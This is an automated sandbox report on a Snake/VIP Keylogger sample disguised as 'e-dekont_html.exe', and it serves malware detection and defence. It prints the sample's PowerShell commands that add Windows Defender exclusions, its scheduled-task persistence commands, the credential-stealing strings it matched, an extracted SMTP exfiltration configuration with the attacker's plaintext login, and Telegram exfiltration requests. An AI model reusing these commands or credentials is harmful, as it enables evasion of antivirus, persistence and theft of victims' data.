Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e-dekont_html.exe

Overview

General Information

Sample name:e-dekont_html.exe
Analysis ID:1608223
MD5:880267e7b0dac545e1eb0f4c68038532
SHA1:44bbbe3d07e732148cec1304630736bbe829bef0
SHA256:97d2ac9df49a698cbe55f68068a93604206580f9696c8bf319d55c2e637c9727
Tags:exegeoMassLoggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • e-dekont_html.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\e-dekont_html.exe" MD5: 880267E7B0DAC545E1EB0F4C68038532)
    • powershell.exe (PID: 7848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5500 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7944 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • e-dekont_html.exe (PID: 8128 cmdline: "C:\Users\user\Desktop\e-dekont_html.exe" MD5: 880267E7B0DAC545E1EB0F4C68038532)
  • HvgRSvNGGXnNtV.exe (PID: 2064 cmdline: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe MD5: 880267E7B0DAC545E1EB0F4C68038532)
    • schtasks.exe (PID: 6500 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpFE1C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • HvgRSvNGGXnNtV.exe (PID: 7468 cmdline: "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe" MD5: 880267E7B0DAC545E1EB0F4C68038532)
    • HvgRSvNGGXnNtV.exe (PID: 7508 cmdline: "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe" MD5: 880267E7B0DAC545E1EB0F4C68038532)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000010.00000002.3785666315.000000000043D000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x5aa0:$a1: get_encryptedPassword
          • 0x6028:$a2: get_encryptedUsername
          • 0x5713:$a3: get_timePasswordChanged
          • 0x582a:$a4: get_passwordField
          • 0x5ab6:$a5: set_encryptedPassword
          • 0x87d2:$a6: get_passwords
          • 0x8b66:$a7: get_logins
          • 0x87be:$a8: GetOutlookPasswords
          • 0x8177:$a9: StartKeylogger
          • 0x8abf:$a10: KeyLoggerEventArgs
          • 0x8217:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 25 entries
          SourceRuleDescriptionAuthorStrings
          11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2bea0:$a1: get_encryptedPassword
                • 0x2c428:$a2: get_encryptedUsername
                • 0x2bb13:$a3: get_timePasswordChanged
                • 0x2bc2a:$a4: get_passwordField
                • 0x2beb6:$a5: set_encryptedPassword
                • 0x2ebd2:$a6: get_passwords
                • 0x2ef66:$a7: get_logins
                • 0x2ebbe:$a8: GetOutlookPasswords
                • 0x2e577:$a9: StartKeylogger
                • 0x2eebf:$a10: KeyLoggerEventArgs
                • 0x2e617:$a11: KeyLoggerEventArgsEventHandler
                11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3976d:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 47 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 7624, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", ProcessId: 7848, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 7624, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", ProcessId: 7848, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpFE1C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpFE1C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe, ParentImage: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe, ParentProcessId: 2064, ParentProcessName: HvgRSvNGGXnNtV.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpFE1C.tmp", ProcessId: 6500, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 7624, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp", ProcessId: 7944, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 7624, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", ProcessId: 7848, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 7624, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp", ProcessId: 7944, ProcessName: schtasks.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-06T11:15:40.272859+010028033053Unknown Traffic192.168.2.749728104.21.96.1443TCP
                2025-02-06T11:15:41.719867+010028033053Unknown Traffic192.168.2.749741104.21.96.1443TCP
                2025-02-06T11:15:43.214395+010028033053Unknown Traffic192.168.2.749755104.21.96.1443TCP
                2025-02-06T11:15:44.446620+010028033053Unknown Traffic192.168.2.749762104.21.96.1443TCP
                2025-02-06T11:15:44.922457+010028033053Unknown Traffic192.168.2.749768104.21.96.1443TCP
                2025-02-06T11:15:48.753897+010028033053Unknown Traffic192.168.2.749804104.21.96.1443TCP
                2025-02-06T11:15:49.277462+010028033053Unknown Traffic192.168.2.749805104.21.96.1443TCP
                2025-02-06T11:15:51.746919+010028033053Unknown Traffic192.168.2.749829104.21.96.1443TCP
                2025-02-06T11:15:54.980221+010028033053Unknown Traffic192.168.2.749855104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-06T11:15:38.868025+010028032742Potentially Bad Traffic192.168.2.749710132.226.8.16980TCP
                2025-02-06T11:15:39.868020+010028032742Potentially Bad Traffic192.168.2.749710132.226.8.16980TCP
                2025-02-06T11:15:41.180531+010028032742Potentially Bad Traffic192.168.2.749735132.226.8.16980TCP
                2025-02-06T11:15:42.430468+010028032742Potentially Bad Traffic192.168.2.749742132.226.8.16980TCP
                2025-02-06T11:15:42.789911+010028032742Potentially Bad Traffic192.168.2.749748132.226.8.16980TCP
                2025-02-06T11:15:43.477487+010028032742Potentially Bad Traffic192.168.2.749742132.226.8.16980TCP
                2025-02-06T11:15:45.310203+010028032742Potentially Bad Traffic192.168.2.749769132.226.8.16980TCP
                2025-02-06T11:15:46.727430+010028032742Potentially Bad Traffic192.168.2.749783132.226.8.16980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-06T11:15:51.579892+010018100071Potentially Bad Traffic192.168.2.749827149.154.167.220443TCP
                2025-02-06T11:15:56.069453+010018100071Potentially Bad Traffic192.168.2.749861149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
                Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeReversingLabs: Detection: 42%
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeVirustotal: Detection: 52%Perma Link
                Source: e-dekont_html.exeVirustotal: Detection: 52%Perma Link
                Source: e-dekont_html.exeReversingLabs: Detection: 42%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeJoe Sandbox ML: detected
                Source: e-dekont_html.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: e-dekont_html.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49722 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49754 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49827 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49861 version: TLS 1.2
                Source: e-dekont_html.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: QrSB.pdb source: e-dekont_html.exe, HvgRSvNGGXnNtV.exe.0.dr
                Source: Binary string: QrSB.pdbSHA256 source: e-dekont_html.exe, HvgRSvNGGXnNtV.exe.0.dr
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 0864CEF9h0_2_0864C760
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 0161F8E9h10_2_0161F631
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 0161FD41h10_2_0161FA88
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E50D0Dh10_2_06E50B30
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E51697h10_2_06E50B30
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E5FAB9h10_2_06E5F810
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E531E0h10_2_06E52DC8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E52C19h10_2_06E52968
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E5E959h10_2_06E5E6B0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E5E501h10_2_06E5E258
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E5E0A9h10_2_06E5DE00
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E5F661h10_2_06E5F3B8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E5F209h10_2_06E5EF60
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E5EDB1h10_2_06E5EB08
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E5D3A1h10_2_06E5D0F8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E5CF49h10_2_06E5CCA0
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_06E50040
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E5DC51h10_2_06E5D9A8
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E531E0h10_2_06E52DBF
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E5D7F9h10_2_06E5D550
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 4x nop then jmp 06E531E0h10_2_06E5310E
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 4x nop then jmp 07C4C159h11_2_07C4B9C0
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 4x nop then jmp 00EFF8E9h16_2_00EFF631
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeCode function: 4x nop then jmp 00EFFD41h16_2_00EFFA88

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49861 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49827 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.7:54889 -> 1.1.1.1:53
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2006/02/2025%20/%2017:39:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2006/02/2025%20/%2017:09:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49748 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49769 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49735 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49783 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49710 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49742 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49755 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49741 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49728 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49829 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49762 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49768 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49804 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49855 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49805 -> 104.21.96.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
